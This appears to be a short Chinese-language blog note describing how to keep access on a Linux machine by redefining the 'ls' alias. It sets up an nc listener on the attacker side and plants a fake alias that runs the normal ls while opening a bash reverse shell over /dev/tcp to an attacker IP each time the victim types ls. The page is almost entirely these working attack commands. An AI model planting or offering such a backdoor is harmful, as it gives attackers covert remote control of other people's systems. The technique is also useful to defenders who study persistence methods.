【笔记】Linux为命令添加别名时执行反弹Shell

发表于 更新于 阅读次数:

前言

Linux为命令添加别名时执行反弹Shell,从而实现权限维持

查看原命令是否已经有别名(可选)

  • 有些命令已经定义别名了,此时再伪造别名时要注意携带旧参数
1
alias ls
1
alias ls='ls --color=auto'

攻击者监听反弹Shell

1
nc -lvp <port_local>

在受害机伪造新的别名并反弹Shell

1
alias ls='alerts(){ ls --color=auto $*; bash -i >& /dev/tcp/<ip>/<port> 0>&1; };alerts'

受害者执行别名命令

1
ls

完成